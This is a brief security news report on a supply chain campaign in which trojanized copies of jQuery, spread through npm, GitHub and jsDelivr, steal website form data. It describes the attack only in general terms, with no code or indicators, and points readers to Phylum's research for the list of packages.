Skip to content

Trojanized jQuery Packages Spread via 'Complex' Supply Chain Attack

Trojanized jQuery Packages Spread via 'Complex' Supply Chain Attack
The campaign, which distributes dozens of malicious jQuery variants across npm, GitHub, and jsDelivr, appears to be a manual effort, and lacks the typical pattern that characterizes similar, related attacks.

Table of Contents

In a recent supply chain attack, cyberattackers have been distributing Trojanized packages for the popular JavaScript library jQuery across npm, GitHub, and jsDelivr repositories. The malicious packages contain a copy of jQuery with a modified end function that includes additional malicious code designed to extract website form data and send it to various URLs. The attackers have shown an unusual lack of a clear pattern of nomenclature and attribution, making it difficult to track their activity. While the attack appears to be a targeted effort, the broad distribution of the packages means it can potentially have a wide impact on unsuspecting developers. This attack highlights the increasing complexity and potential for the broad reach of supply chain threat actors. Organizations and developers are encouraged to scan any code used in development projects before distributing it to developers to avoid installing the malicious packages. For more information, Phylum's researchers have included a list of all the names of the packages related to the campaign and the date they were published, as well as the username associated with who published them in a blog post.